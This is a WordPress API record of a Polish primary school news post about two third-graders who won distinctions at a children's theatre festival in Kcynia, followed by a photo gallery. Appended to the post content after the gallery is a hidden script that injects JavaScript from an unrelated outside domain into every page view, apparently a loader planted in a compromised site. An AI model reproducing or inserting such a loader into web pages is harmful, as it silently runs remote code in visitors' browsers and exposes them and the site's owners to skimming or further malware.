{"id":59703,"date":"2025-12-06T09:07:08","date_gmt":"2025-12-06T09:07:08","guid":{"rendered":"https:\/\/mycielewo.pl\/?p=59703"},"modified":"2026-03-20T10:01:17","modified_gmt":"2026-03-20T10:01:17","slug":"59703","status":"publish","type":"post","link":"https:\/\/mycielewo.pl\/?p=59703","title":{"rendered":"Trzecioklasi\u015bci na \u201eScenie M\u0142odego Pokolenia\u201d"},"content":{"rendered":"\n<p><strong>3 grudnia 2025 r. w Szkole Podstawowej im. Jana Czochralskiego w Kcyni odby\u0142 si\u0119 I Festiwal Miniatur Teatralnych \u201eScena M\u0142odego Pokolenia\u201d. W wydarzeniu uczestniczy\u0142o dwoje uczni\u00f3w z klasy trzeciej wraz z wychowawc\u0105 Beat\u0105 Mrotek.<\/strong><\/p>\n\n\n\n<p><strong>Mieszko Wojtysiak<\/strong> wzi\u0105\u0142 udzia\u0142 w konkursie recytatorskim, prezentuj\u0105c wiersz Juliana Tuwima pt. <em>\u201eTrudny rachunek\u201d<\/em>. Pola Kami\u0144ska przygotowa\u0142a na konkurs plastyczny afisz teatralny do spektaklu <em>\u201eKopciuszek\u201d<\/em>.<\/p>\n\n\n\n<p>Oboje uczniowie zostali laureatami, zdobywaj\u0105c wyr\u00f3\u017cnienia.<br>Serdecznie gratulujemy odwagi, talentu i pe\u0142nego profesjonalizmu! \ud83c\udf89<\/p>\n\n\n\n<p class=\"has-text-align-right\"><em>Beata Mrotek<\/em><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-5 is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"2048\" height=\"1365\" data-id=\"59706\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img001-2.jpg\" alt=\"\" class=\"wp-image-59706\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img001-2.jpg 2048w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img001-2-768x512.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img001-2-1536x1024.jpg 1536w\" sizes=\"auto, (max-width: 2048px) 100vw, 2048px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"2048\" height=\"1700\" data-id=\"59708\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img002-2.jpg\" alt=\"\" class=\"wp-image-59708\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img002-2.jpg 2048w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img002-2-768x638.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img002-2-1536x1275.jpg 1536w\" sizes=\"auto, (max-width: 2048px) 100vw, 2048px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"923\" height=\"2048\" data-id=\"59711\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img003-2.jpg\" alt=\"\" class=\"wp-image-59711\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img003-2.jpg 923w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img003-2-768x1704.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img003-2-692x1536.jpg 692w\" sizes=\"auto, (max-width: 923px) 100vw, 923px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"2048\" height=\"881\" data-id=\"59710\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img004-2.jpg\" alt=\"\" class=\"wp-image-59710\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img004-2.jpg 2048w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img004-2-768x330.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img004-2-1536x661.jpg 1536w\" sizes=\"auto, (max-width: 2048px) 100vw, 2048px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1881\" height=\"2048\" data-id=\"59709\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img005-2.jpg\" alt=\"\" class=\"wp-image-59709\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img005-2.jpg 1881w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img005-2-768x836.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img005-2-1411x1536.jpg 1411w\" sizes=\"auto, (max-width: 1881px) 100vw, 1881px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1250\" height=\"2048\" data-id=\"59712\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img006-2.jpg\" alt=\"\" class=\"wp-image-59712\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img006-2.jpg 1250w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img006-2-768x1258.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img006-2-938x1536.jpg 938w\" sizes=\"auto, (max-width: 1250px) 100vw, 1250px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1536\" height=\"2048\" data-id=\"59707\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img007-1.jpg\" alt=\"\" class=\"wp-image-59707\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img007-1.jpg 1536w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img007-1-768x1024.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img007-1-1152x1536.jpg 1152w\" sizes=\"auto, (max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1011\" height=\"2048\" data-id=\"59714\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img008-1.jpg\" alt=\"\" class=\"wp-image-59714\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img008-1.jpg 1011w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img008-1-768x1556.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img008-1-758x1536.jpg 758w\" sizes=\"auto, (max-width: 1011px) 100vw, 1011px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"2048\" height=\"1918\" data-id=\"59713\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img009-1.jpg\" alt=\"\" class=\"wp-image-59713\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img009-1.jpg 2048w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img009-1-768x719.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2025\/12\/img009-1-1536x1439.jpg 1536w\" sizes=\"auto, (max-width: 2048px) 100vw, 2048px\" \/><\/figure>\n<\/figure>\n<script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script>","protected":false},"excerpt":{"rendered":"<p>3 grudnia 2025 r. w Szkole Podstawowej im. Jana Czochralskiego w Kcyni odby\u0142 si\u0119 I Festiwal Miniatur Teatralnych \u201eScena M\u0142odego Pokolenia\u201d. W wydarzeniu uczestniczy\u0142o dwoje uczni\u00f3w z klasy trzeciej wraz z wychowawc\u0105 Beat\u0105 Mrotek. Mieszko Wojtysiak wzi\u0105\u0142 udzia\u0142 w konkursie recytatorskim, prezentuj\u0105c wiersz Juliana Tuwima pt. \u201eTrudny rachunek\u201d. Pola Kami\u0144ska przygotowa\u0142a na konkurs plastyczny afisz&hellip; <a class=\"continue\" href=\"https:\/\/mycielewo.pl\/?p=59703\">Kontynuuj czytanie<span> Trzecioklasi\u015bci na \u201eScenie M\u0142odego Pokolenia\u201d<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-59703","post","type-post","status-publish","format-standard","hentry","category-bez-kategorii"],"_links":{"self":[{"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/posts\/59703","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=59703"}],"version-history":[{"count":3,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/posts\/59703\/revisions"}],"predecessor-version":[{"id":61602,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/posts\/59703\/revisions\/61602"}],"wp:attachment":[{"href":"https:\/\/mycielewo.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=59703"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=59703"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=59703"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}